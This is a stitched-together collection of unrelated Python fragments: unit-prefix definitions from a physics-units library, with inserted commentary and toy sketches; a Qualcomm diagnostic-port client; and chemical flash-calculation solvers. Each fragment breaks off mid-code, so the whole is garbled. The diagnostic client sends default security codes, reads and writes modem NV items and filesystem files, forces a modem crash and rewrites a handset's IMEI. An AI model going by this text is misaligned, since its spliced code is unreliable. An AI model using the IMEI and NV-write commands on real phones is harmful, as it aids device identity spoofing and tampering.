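        acc[base] = acc.get(base, Fraction(0)) + Fraction(power)
    kept = [(b, p) for b, p in acc.items() if p != 0]
    kept.sort(key=lambda x: (-x[1], x[0]))
    return kept

# m * s^-2 * m  ->  m^2 s^-2
result = gather([("m", 1), ("s", -2), ("m", 1)])
# s * s^-1 cancels entirely
cancelled = gather([("s", 1), ("s", -1)])
```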
si_prefixes = [
(['Y'], ['yotta'], 1e24),
(['Z'], ['zetta'], 1e21),
(['E'], ['exa'], 1e18),
(['P'], ['peta'], 1e15),
(['T'], ['tera'], 1e12),
(['G'], ['giga'], 1e9),
(['M'], ['mega'], 1e6),
(['k'], ['kilo'], 1e3),
(['h'], ['hecto'], 1e2),
(['da'], ['deka', 'deca'], 1e1),
(['d'], ['deci'], 1e-1),
(['c'], ['centi'], 1e-2),
(['m'], ['milli'], 1e-3),
(['u'], ['micro'], 1e-6),
(['n'], ['nano'], 1e-9),
(['p'], ['pico'], 1e-12),
(['f'], ['femto'], 1e-15),
(['a'], ['atto'], 1e-18),
(['z'], ['zepto'], 1e-21),
(['y'], ['yocto'], 1e-24)
]
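The si_prefixes table maps each prefix, in both short and long forms, to its decimal factor; `_add_prefixes` iterates it to mint PrefixUnit instances. A small sketch that flattens an abbreviated copy of the same table shape into a name → factor lookup:

```python
# Abbreviated copy of the (short_names, long_names, factor) table shape
prefixes = [
    (['k'], ['kilo'], 1e3),
    (['m'], ['milli'], 1e-3),
    (['u'], ['micro'], 1e-6),
]

def prefix_factors(table):
    """Flatten (short, long, factor) rows into one name -> factor dict."""
    factors = {}
    for short, full, factor in table:
        for name in short + full:
            factors[name] = factor
    return factors

lookup = prefix_factors(prefixes)
```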
binary_prefixes = [
(['Ki'], ['kibi'], 2. ** 10),
(['Mi'], ['mebi'], 2. ** 20),
(['Gi'], ['gibi'], 2. ** 30),
(['Ti'], ['tebi'], 2. ** 40),
(['Pi'], ['pebi'], 2. ** 50),
(['Ei'], ['exbi'], 2. ** 60)
]
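The prefix tables above are consumed by `_add_prefixes` below, which crosses every prefix symbol with every alias of a unit. A minimal sketch of that name-generation step (the alias lists used in the test are made up for illustration):

```python
# Sketch of the name-generation loop in _add_prefixes: for each prefix
# definition (short_names, long_names, factor), pair each short prefix
# with each short alias of the unit, honoring an exclusion list.
def prefixed_names(short_aliases, prefixes, excludes=()):
    names = []
    for shorts, _longs, _factor in prefixes:
        for prefix in shorts:
            if prefix in excludes:
                continue
            names.extend(prefix + alias for alias in short_aliases)
    return names
```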
def _add_prefixes(u, excludes=[], namespace=None, prefixes=False):
"""
Set up all of the standard metric prefixes for a unit. This
function should not be used directly, but instead use the
`prefixes` kwarg on `def_unit`.
Parameters
----------
excludes : list of str, optional
Any prefixes to exclude from creation to avoid namespace
collisions.
namespace : dict, optional
When provided, inject the unit (and all of its aliases) into
the given namespace dictionary.
prefixes : list, optional
When provided, it is a list of prefix definitions of the form:
(short_names, long_names, factor)
"""
if prefixes is True:
prefixes = si_prefixes
elif prefixes is False:
prefixes = []
for short, full, factor in prefixes:
names = []
format = {}
for prefix in short:
if prefix in excludes:
continue
for alias in u.short_names:
names.append(prefix + alias)
# This is a hack to use Greek mu as a prefix
# for some formatters.
if prefix == 'u':
format['latex'] = r'\mu ' + u.get_format_name('latex')
format['unicode'] = 'μ' + u.get_format_name('unicode')
for key, val in u._format.items():
format.setdefault(key, prefix + val)
for prefix in full:
if prefix in excludes:
continue
for alias in u.long_names:
names.append(prefix + alias)
if len(names):
PrefixUnit(names, CompositeUnit(factor, [u], [1],
_error_check=False),
namespace=namespace, format=format)
def def_unit(s, represents=None, doc=None, format=None, prefixes=False,
exclude_prefixes=[], namespace=None):
"""
Factory function for defining new units.
Parameters
----------
s : str or list of str
The name of the unit. If a list, the first element is the
canonical (short) name, and the rest of the elements are
aliases.
represents : UnitBase instance, optional
The unit that this named unit represents. If not provided,
a new `IrreducibleUnit` is created.
doc : str, optional
A docstring describing the unit.
format : dict, optional
A mapping to format-specific representations of this unit.
For example, for the ``Ohm`` unit, it might be nice to
have it displayed as ``\\Omega`` by the ``latex``
formatter. In that case, `format` argument should be set
to::
{'latex': r'\\Omega'}
prefixes : bool or list, optional
When `True`, generate all of the SI prefixed versions of the
unit as well. For example, for a given unit ``m``, will
generate ``mm``, ``cm``, ``km``, etc. When a list, it is a list of
prefix definitions of the form:
(short_names, long_names, factor)
Default is `False`. This function always returns the base
unit object, even if multiple scaled versions of the unit were
created.
exclude_prefixes : list of str, optional
If any of the SI prefixes need to be excluded, they may be
listed here. For example, ``Pa`` can be interpreted either as
"petaannum" or "Pascal". Therefore, when defining | |
only be written. Aborting.")
self.efs_close(efsmethod, fdata)
return 0
num_bytes = 0
offset = 0
fname = srcpath[srcpath.rfind("/") + 1:]
fname = os.path.join(dstpath, fname)
with open(fname, "wb") as write_handle:
dataleft = size
while dataleft > 0:
rsize = dataleft
if rsize > FS_DIAG_MAX_READ_REQ:
rsize = FS_DIAG_MAX_READ_REQ
finfo = self.efs_read(efsmethod, fdata, rsize, offset)
if finfo == -1:
break
fdata, offset, bytes_read, data = finfo
write_handle.write(data)
num_bytes += bytes_read
offset += rsize
dataleft -= rsize
self.efs_close(efsmethod, fdata)
return num_bytes
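`efsreadfile` above transfers the file in requests capped at `FS_DIAG_MAX_READ_REQ`. The generic chunked-transfer pattern it uses can be sketched standalone (the `read_at`/`write` callables here are illustrative stand-ins for `efs_read` and the file handle):

```python
# Copy `size` bytes through a request-size-limited channel, returning the
# number of bytes actually transferred.
def chunked_copy(read_at, write, size, max_req):
    """read_at(offset, n) -> bytes; write(data) consumes them."""
    offset = 0
    total = 0
    while size - total > 0:
        n = min(size - total, max_req)
        data = read_at(offset, n)
        if not data:  # short read: channel exhausted or error
            break
        write(data)
        offset += len(data)
        total += len(data)
    return total
```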
def efswritefile(self, srcpath, dstpath):
alternateefs = b"\x4B\x3E\x00\x00" + b"\x00" * 0x28
standardefs = b"\x4B\x13\x00\x00" + b"\x00" * 0x28
resp = self.send(alternateefs)
if resp[0] == 0x4B:
efsmethod = 0x3E
else:
resp = self.send(standardefs)
if resp[0] == 0x4B:
efsmethod = 0x13
else:
logging.error("No known efs method detected for writing.")
return 0
with open(srcpath, "rb") as rf:
fdata = self.efs_open(efsmethod, O_WRONLY, 0, srcpath)
if fdata == -1:
return 0
mode, size, nlink, atime, mtime, ctime = self.efs_fstat(efsmethod, fdata)
if size == 0:
self.efs_close(efsmethod, fdata)
return 0
"""
acr=(mode & O_ACCMODE)
if acr==O_RDONLY:
print("File can only be read. Aborting.")
self.efs_close(efsmethod, fdata)
return
"""
num_bytes = 0
offset = 0
size = os.stat(srcpath).st_size
dataleft = size
while dataleft > 0:
rsize = dataleft
if rsize > FS_DIAG_MAX_READ_REQ:
rsize = FS_DIAG_MAX_READ_REQ
data = rf.read(rsize)
finfo = self.efs_write(efsmethod, fdata, offset, data)
if finfo == -1:
break
fdata, offset, bytes_written = finfo
num_bytes += bytes_written
offset += rsize
dataleft -= rsize
self.efs_close(efsmethod, fdata)
return num_bytes
class DiagTools(metaclass=LogBase):
def run(self, args):
self.interface = -1
self.vid = None
self.pid = None
self.serial = args.serial
if args.portname is not None:
self.portname = args.portname
self.serial = True
else:
self.portname = ""
if args.vid != "":
self.vid = int(args.vid, 16)
if args.pid != "":
self.pid = int(args.pid, 16)
if args.interface != "":
self.interface = int(args.interface, 16)
logfilename = "diag.txt"
if args.debugmode:
if os.path.exists(logfilename):
os.remove(logfilename)
fh = logging.FileHandler(logfilename)
self.__logger.addHandler(fh)
self.__logger.setLevel(logging.DEBUG)
else:
self.__logger.setLevel(logging.INFO)
connected = False
diag = None
if self.vid is None or self.pid is None:
diag = qcdiag(loglevel=self.__logger.level, portconfig=default_diag_vid_pid)
if self.serial:
diag.portname = self.portname
connected = diag.connect(self.serial)
else:
diag = qcdiag(loglevel=self.__logger.level, portconfig=[[self.vid, self.pid, self.interface]])
if self.serial:
diag.portname = self.portname
connected = diag.connect(self.serial)
if connected:
cmd = args.cmd
if cmd=="sp":
diag.send_sp(args.spval)
elif cmd=="spc":
diag.send_spc(args.spcval)
elif cmd=="cmd":
if args.cmdval=="":
print("cmd needed as hex string, example: 00")
else:
print(diag.send_cmd(args.cmdval))
elif cmd=="info":
print(diag.cmd_info())
elif cmd=="download":
diag.enter_downloadmode()
elif cmd=="sahara":
diag.enter_saharamode()
elif cmd=="crash":
diag.enforce_crash()
elif cmd=="efslistdir":
print(diag.efslistdir(args.path))
elif cmd=="efsreadfile":
if args.src=="" or args.dst=="":
print("Usage: -efsreadfile -src srcfile -dst dstfile")
sys.exit()
print(diag.efsreadfile(args.src,args.dst))
elif cmd=="nvread":
if "0x" in args.nvitem:
nvitem = int(args.nvitem, 16)
else:
nvitem = int(args.nvitem)
diag.print_nvitem(nvitem)
elif cmd=="nvreadsub":
if args.nvitem is None or args.nvindex is None:
print("Usage: nvreadsub [nvitem] [nvindex]")
exit(1)
if "0x" in args.nvitem:
nvitem = int(args.nvitem, 16)
else:
nvitem = int(args.nvitem)
if "0x" in args.nvindex:
nvindex = int(args.nvindex, 16)
else:
nvindex = int(args.nvindex)
diag.print_nvitemsub(nvitem,nvindex)
elif cmd=="nvwrite":
if args.data is None:
print("NvWrite requires data to write")
sys.exit()
if "0x" in args.nvitem:
nvitem = int(args.nvitem, 16)
else:
nvitem = int(args.nvitem)
data = unhexlify(args.data)
diag.write_nvitem(nvitem, data)
elif cmd=="nvwritesub":
if args.nvitem is None or args.nvindex is None or args.data is None:
print("NvWriteSub requires item, index and data to write")
sys.exit()
if "0x" in args.nvitem:
nvitem = int(args.nvitem, 16)
else:
nvitem = int(args.nvitem)
if "0x" in args.nvindex:
nvindex = int(args.nvindex, 16)
else:
nvindex = int(args.nvindex)
data = unhexlify(args.data)
diag.write_nvitemsub(nvitem, nvindex, data)
elif cmd=="nvbackup":
diag.backup_nvitems(args.filename, "error.log")
elif cmd=="writeimei":
diag.write_imei(args.imei)
elif cmd=="efsread":
diag.efsread(args.filename)
else:
print("A command is required. Use -cmd \"data\" for sending requests.")
print()
print("Valid commands are:")
print("-------------------")
print("info cmd sp spc nvread nvreadsub" +
" nvwrite writeimei nvwritesub nvbackup efsread efsreadfile" +
" efslistdir download sahara crash")
print()
diag.disconnect()
sys.exit()
else:
print("No diag device detected. Use -pid and -vid options. See -h for help.")
diag.disconnect()
sys.exit()
def main():
info = "Qualcomm Diag Client (c) B.Kerler 2019-2021."
parser = argparse.ArgumentParser(description=info)
print("\n" + info + "\n---------------------------------------\n")
subparser = parser.add_subparsers(dest="cmd", help="Valid commands are:\ninfo cmd sp spc nvread nvreadsub" +
" nvwrite writeimei nvwritesub nvbackup efsread efsreadfile\n" +
" efslistdir download sahara crash")
parser_info = subparser.add_parser("info", help="[Option] Get diag info")
parser_info.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_info.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_info.add_argument("-interface", metavar="<interface>", help="[Option] Specify interface number, default=0",
default="0")
parser_info.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_info.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_info.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_cmd = subparser.add_parser("cmd", help="Send command")
parser_cmd.add_argument("cmdval", help="cmd to send (hexstring), default: 00",
default="", const="00", nargs="?")
parser_cmd.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_cmd.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_cmd.add_argument("-interface", metavar="<interface>", help="[Option] Specify interface number, default=0",
default="0")
parser_cmd.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_cmd.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_cmd.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_sp = subparser.add_parser("sp", help="Send Security password")
parser_sp.add_argument("spval", help="Security password to send, default: FFFFFFFFFFFFFFFE",
default="FFFFFFFFFFFFFFFE", nargs="?")
parser_sp.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_sp.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_sp.add_argument("-interface", metavar="<interface>", help="[Option] Specify interface number, default=0",
default="0")
parser_sp.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_sp.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_sp.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_spc = subparser.add_parser("spc", help="Send Security Code")
parser_spc.add_argument("spcval", help="Security code to send, default: 303030303030",
default="303030303030", nargs="?")
parser_spc.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_spc.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_spc.add_argument("-interface", metavar="<interface>", help="[Option] Specify interface number, default=0",
default="0")
parser_spc.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_spc.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_spc.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_nvread = subparser.add_parser("nvread", help="Read nvitem")
parser_nvread.add_argument("nvitem", help="[Option] NVItem to read", default="")
parser_nvread.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_nvread.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_nvread.add_argument("-interface", metavar="<interface>", help="[Option] Specify interface number, default=0",
default="0")
parser_nvread.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_nvread.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_nvread.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_nvreadsub = subparser.add_parser("nvreadsub", help="Read nvitem using subsystem")
parser_nvreadsub.add_argument("nvitem", help="[Option] NVItem to read", default="")
parser_nvreadsub.add_argument("nvindex", help="[Option] Index to read", default="")
parser_nvreadsub.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_nvreadsub.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_nvreadsub.add_argument("-interface", metavar="<interface>", help="[Option] Specify interface number, default=0",
default="0")
parser_nvreadsub.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_nvreadsub.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_nvreadsub.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_nvwrite = subparser.add_parser("nvwrite", help="Write nvitem")
parser_nvwrite.add_argument("nvitem", help="[Option] NVItem to write", default="")
parser_nvwrite.add_argument("data", help="[Option] Data to write", default="")
parser_nvwrite.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_nvwrite.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_nvwrite.add_argument("-interface", metavar="<interface>", help="[Option] Specify interface number, default=0",
default="0")
parser_nvwrite.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_nvwrite.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_nvwrite.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_nvwritesub = subparser.add_parser("nvwritesub", help="Write nvitem using subsystem")
parser_nvwritesub.add_argument("nvitem", help="[Option] NVItem to read", default="")
parser_nvwritesub.add_argument("nvindex", help="[Option] Index to read", default="")
parser_nvwritesub.add_argument("data", help="[Option] Data to write", default="")
parser_nvwritesub.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_nvwritesub.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_nvwritesub.add_argument("-interface", metavar="<interface>", help="[Option] Specify interface number, default=0",
default="0")
parser_nvwritesub.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_nvwritesub.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_nvwritesub.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_writeimei = subparser.add_parser("writeimei", help="Write imei")
parser_writeimei.add_argument("imei", metavar=("<imei1,imei2,...>"), help="[Option] IMEI to write", default="")
parser_writeimei.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_writeimei.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_writeimei.add_argument("-interface", metavar="<interface>", help="[Option] Specify interface number, default=0",
default="0")
parser_writeimei.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_writeimei.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_writeimei.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_nvbackup = subparser.add_parser("nvbackup", help="Make nvitem backup as json")
parser_nvbackup.add_argument("filename", help="[Option] Filename to write to", default="")
parser_nvbackup.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_nvbackup.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_nvbackup.add_argument("-interface", metavar="<interface>", help="[Option] Specify interface number, default=0",
default="0")
parser_nvbackup.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_nvbackup.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_nvbackup.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_efsread = subparser.add_parser("efsread", help="Read efs")
parser_efsread.add_argument("filename", help="[Option] Filename to write to", default="")
parser_efsread.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_efsread.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_efsread.add_argument("-interface", metavar="<interface>", help="[Option] Specify interface number, default=0",
default="0")
parser_efsread.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_efsread.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_efsread.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_efsreadfile = subparser.add_parser("efsreadfile", help="Read efs file")
parser_efsreadfile.add_argument("src", help="[Option] Source filename", default="")
parser_efsreadfile.add_argument("dst", help="[Option] Destination filename", default="")
parser_efsreadfile.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_efsreadfile.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_efsreadfile.add_argument("-interface", metavar="<interface>", help="[Option] Specify interface number, default=0",
default="0")
parser_efsreadfile.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_efsreadfile.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_efsreadfile.add_argument("-debugmode", | |
lnphis_l
l_old, g_old = l, g
# print(err, V_over_F, Ks) # xs, ys
# Check for a trivial solution (both phase compositions identical)
comp_difference = sum([abs(xi - yi) for xi, yi in zip(xs, ys)])
if comp_difference < trivial_solution_tol:
raise TrivialSolutionError("Converged to trivial condition, compositions of both phases equal",
comp_difference, iteration, err)
if err < tol and not limited_Z:
# err_mole_balance = 0.0
# for i in cmps:
# err_mole_balance += abs(xs_old[i] * (1.0 - V_over_F_old) + ys_old[i] * V_over_F_old - zs[i])
# if err_mole_balance < mole_balance_tol:
# return V_over_F, xs, ys, l, g, iteration, err
# Temporary!
g = gas_phase.to(ys_old, T=T, P=P, V=V)
l = liquid_phase.to(xs_old, T=T, P=P, V=V)
return V_over_F_old, xs_old, ys_old, l, g, iteration, err
# elif err < tol and limited_Z:
# print(l.fugacities()/np.array(g.fugacities()))
err1, err2, err3 = err, err1, err2
raise UnconvergedError('End of SS without convergence')
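The `flash_inner_loop` call used throughout these successive-substitution routines solves the Rachford-Rice equation for the vapor fraction. A minimal stdlib-only sketch by bisection (not the optimized solver used here; assumes a root strictly inside (0, 1)):

```python
def rachford_rice_bisect(zs, Ks, tol=1e-12):
    """Solve sum(z_i*(K_i-1)/(1 + VF*(K_i-1))) = 0 for the vapor fraction VF,
    then back out liquid (xs) and vapor (ys) compositions."""
    def f(VF):
        return sum(z*(K - 1.0)/(1.0 + VF*(K - 1.0)) for z, K in zip(zs, Ks))
    lo, hi = 1e-15, 1.0 - 1e-15
    for _ in range(200):
        mid = 0.5*(lo + hi)
        # f is monotonically decreasing in VF, so f(mid) > 0 puts the root right of mid
        if f(mid) > 0.0:
            lo = mid
        else:
            hi = mid
        if hi - lo < tol:
            break
    VF = 0.5*(lo + hi)
    xs = [z/(1.0 + VF*(K - 1.0)) for z, K in zip(zs, Ks)]
    ys = [K*x for K, x in zip(Ks, xs)]
    return VF, xs, ys
```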
def sequential_substitution_NP(T, P, zs, compositions_guesses, betas_guesses,
phases, maxiter=1000, tol=1E-13,
trivial_solution_tol=1e-5, ref_phase=2):
compositions = compositions_guesses
cmps = range(len(zs))
phase_count = len(phases)
phases_iter = range(phase_count)
phase_iter_n1 = range(phase_count - 1)
betas = betas_guesses
if len(betas) < len(phases):
betas.append(1.0 - sum(betas))
compositions_K_order = [compositions[i] for i in phases_iter if i != ref_phase]
compositions_ref = compositions_guesses[ref_phase]
for iteration in range(maxiter):
phases = [phases[i].to_TP_zs(T=T, P=P, zs=compositions[i]) for i in phases_iter]
lnphis = [phases[i].lnphis() for i in phases_iter]
Ks = []
lnphis_ref = lnphis[ref_phase]
for i in phases_iter:
if i != ref_phase:
lnphis_i = lnphis[i]
try:
Ks.append([exp(lnphis_ref[j] - lnphis_i[j]) for j in cmps])
except OverflowError:
Ks.append([trunc_exp(lnphis_ref[j] - lnphis_i[j]) for j in cmps])
beta_guesses = [betas[i] for i in phases_iter if i != ref_phase]
#if phase_count == 3:
# Rachford_Rice_solution2(zs, Ks[0], Ks[1], beta_y=beta_guesses[0], beta_z=beta_guesses[1])
betas_new, compositions_new = Rachford_Rice_solutionN(zs, Ks, beta_guesses)
# Sort the order back
beta_ref_new = betas_new[-1]
betas_new = betas_new[:-1]
betas_new.insert(ref_phase, beta_ref_new)
compositions_ref_new = compositions_new[-1]
compositions_K_order_new = compositions_new[:-1]
compositions_new = list(compositions_K_order_new)
compositions_new.insert(ref_phase, compositions_ref_new)
err = 0.0
for i in phase_iter_n1:
Ks_i = Ks[i]
ys = compositions_K_order[i]
try:
for Ki, xi, yi in zip(Ks_i, compositions_ref, ys):
err_i = Ki*xi/yi - 1.0
err += err_i*err_i
except ZeroDivisionError:
err = 0.0
for Ki, xi, yi in zip(Ks_i, compositions_ref, ys):
try:
err_i = Ki*xi/yi - 1.0
err += err_i*err_i
except ZeroDivisionError:
pass
# print(betas, Ks, 'calculated', err)
# print(err)
compositions = compositions_new
compositions_K_order = compositions_K_order_new
compositions_ref = compositions_ref_new
betas = betas_new
# TODO trivial solution check - how to handle - drop phase?
# Check for a trivial solution (both phase compositions identical)
# comp_difference = sum([abs(xi - yi) for xi, yi in zip(xs, ys)])
# if comp_difference < trivial_solution_tol:
# raise ValueError("Converged to trivial condition, compositions of both phases equal")
if err < tol:
return betas, compositions, phases, iteration, err
# if iteration > 100:
# return betas, compositions, phases, iteration, err
raise UnconvergedError('End of SS without convergence')
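`sequential_substitution_NP` above works in "K order" (reference phase last) and then re-inserts the reference phase's beta and composition at their original index. That reordering step, isolated as a sketch:

```python
# Sketch of the ref-phase reordering: the multiphase Rachford-Rice solver
# returns the reference phase last; restore it to its original position.
def reinsert_ref(values, ref_index):
    ref = values[-1]
    rest = list(values[:-1])
    rest.insert(ref_index, ref)
    return rest
```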
def sequential_substitution_Mehra_2P(T, P, zs, xs_guess, ys_guess, liquid_phase,
gas_phase, maxiter=1000, tol=1E-13,
trivial_solution_tol=1e-5,
acc_frequency=3, acc_delay=5,
lambda_max=3, lambda_min=0.0,
V_over_F_guess=None):
xs, ys = xs_guess, ys_guess
if V_over_F_guess is None:
V_over_F = 0.5
else:
V_over_F = V_over_F_guess
N = len(zs)
cmps = range(N)
lambdas = [1.0]*N
Ks = [ys[i]/xs[i] for i in cmps]
gs = []
import numpy as np
for iteration in range(maxiter):
g = gas_phase.to_TP_zs(T=T, P=P, zs=ys)
l = liquid_phase.to_TP_zs(T=T, P=P, zs=xs)
fugacities_g = g.fugacities()
fugacities_l = l.fugacities()
# Ks = [fugacities_l[i]*ys[i]/(fugacities_g[i]*xs[i]) for i in cmps]
lnphis_g = g.lnphis()
lnphis_l = l.lnphis()
phis_g = g.phis()
phis_l = l.phis()
# Ks = [Ks[i]*exp(-lnphis_g[i]/lnphis_l[i]) for i in cmps]
# Ks = [Ks[i]*(phis_l[i]/phis_g[i]/Ks[i])**lambdas[i] for i in cmps]
# Ks = [Ks[i]*fugacities_l[i]/fugacities_g[i] for i in cmps]
# Ks = [Ks[i]*exp(-phis_g[i]/phis_l[i]) for i in cmps]
# Mehra, <NAME>., <NAME>, and <NAME>. “An Accelerated Successive Substitution Algorithm.” The Canadian Journal of Chemical Engineering 61, no. 4 (August 1, 1983): 590-96. https://doi.org/10.1002/cjce.5450610414.
# Strongly believed correct
gis = np.log(fugacities_g) - np.log(fugacities_l)
if not (iteration % acc_frequency) and iteration > acc_delay:
gis_old = np.array(gs[-1])
# lambdas = np.abs(gis_old.T*gis_old/(gis_old.T*(gis_old - gis))*lambdas).tolist() # Alrotithm 3 also working
# lambdas = np.abs(gis_old.T*(gis_old-gis)/((gis_old-gis).T*(gis_old - gis))*lambdas).tolist() # WORKING
lambdas = np.abs(gis.T*gis/(gis_old.T*(gis - gis_old))).tolist() # 34, working
lambdas = [min(max(li, lambda_min), lambda_max) for li in lambdas]
# print(lambdas[0:5])
# print(lambdas)
# print('Ks', Ks, )
# print(Ks[-1], phis_l[-1], phis_g[-1], lambdas[-1], gis[-1], gis_old[-1])
Ks = [Ks[i]*(phis_l[i]/phis_g[i]/Ks[i])**lambdas[i] for i in cmps]
# print(Ks)
else:
Ks = [Ks[i]*fugacities_l[i]/fugacities_g[i] for i in cmps]
# print(Ks[0:5])
gs.append(gis)
# lnKs = [lnKs[i]*1.5 for i in cmps]
V_over_F, xs_new, ys_new = flash_inner_loop(zs, Ks, guess=V_over_F)
# Check for negative fractions - normalize only if needed
for xi in xs_new:
if xi < 0.0:
xs_new_sum = sum(abs(i) for i in xs_new)
xs_new = [abs(i)/xs_new_sum for i in xs_new]
break
for yi in ys_new:
if yi < 0.0:
ys_new_sum = sum(abs(i) for i in ys_new)
ys_new = [abs(i)/ys_new_sum for i in ys_new]
break
err = 0.0
# Suggested tolerance 1e-15
for Ki, xi, yi in zip(Ks, xs, ys):
# equivalent of fugacity ratio
# Could divide by the old Ks as well.
err_i = Ki*xi/yi - 1.0
err += err_i*err_i
# print(err)
# Accept the new compositions
xs, ys = xs_new, ys_new
# Check for a trivial solution (both phase compositions identical)
comp_difference = sum([abs(xi - yi) for xi, yi in zip(xs, ys)])
if comp_difference < trivial_solution_tol:
raise TrivialSolutionError("Converged to trivial condition, compositions of both phases equal",
comp_difference, iteration, err)
if err < tol:
return V_over_F, xs, ys, l, g, iteration, err
raise UnconvergedError('End of SS without convergence')
def sequential_substitution_GDEM3_2P(T, P, zs, xs_guess, ys_guess, liquid_phase,
gas_phase, maxiter=1000, tol=1E-13,
trivial_solution_tol=1e-5, V_over_F_guess=None,
acc_frequency=3, acc_delay=3,
):
xs, ys = xs_guess, ys_guess
if V_over_F_guess is None:
V_over_F = 0.5
else:
V_over_F = V_over_F_guess
cmps = range(len(zs))
all_Ks = []
all_lnKs = []
for iteration in range(maxiter):
g = gas_phase.to_TP_zs(T=T, P=P, zs=ys)
l = liquid_phase.to_TP_zs(T=T, P=P, zs=xs)
lnphis_g = g.lnphis()
lnphis_l = l.lnphis()
# Mehra et al. (1983) is another option
# Ks = [exp(l - g) for l, g in zip(lnphis_l, lnphis_g)]
# if not (iteration %3) and iteration > 3:
# dKs = gdem(Ks, all_Ks[-1], all_Ks[-2], all_Ks[-3])
# print(iteration, dKs)
# Ks = [Ks[i] + dKs[i] for i in cmps]
# all_Ks.append(Ks)
# lnKs = [(l - g) for l, g in zip(lnphis_l, lnphis_g)]
# if not (iteration %3) and iteration > 3:
## dlnKs = gdem(lnKs, all_lnKs[-1], all_lnKs[-2], all_lnKs[-3])
#
# dlnKs = gdem(lnKs, all_lnKs[-1], all_lnKs[-2], all_lnKs[-3])
# lnKs = [lnKs[i] + dlnKs[i] for i in cmps]
# <NAME>., <NAME>, and <NAME>. “An Accelerated Successive Substitution Algorithm.” The Canadian Journal of Chemical Engineering 61, no. 4 (August 1, 1983): 590-96. https://doi.org/10.1002/cjce.5450610414.
lnKs = [(l - g) for l, g in zip(lnphis_l, lnphis_g)]
if not (iteration %acc_frequency) and iteration > acc_delay:
dlnKs = gdem(lnKs, all_lnKs[-1], all_lnKs[-2], all_lnKs[-3])
# print(dlnKs)
lnKs = [lnKs[i] + dlnKs[i] for i in cmps]
# Try to test accelerated
all_lnKs.append(lnKs)
Ks = [exp(lnKi) for lnKi in lnKs]
V_over_F, xs_new, ys_new = flash_inner_loop(zs, Ks, guess=V_over_F)
# Check for negative fractions - normalize only if needed
for xi in xs_new:
if xi < 0.0:
xs_new_sum = sum(abs(i) for i in xs_new)
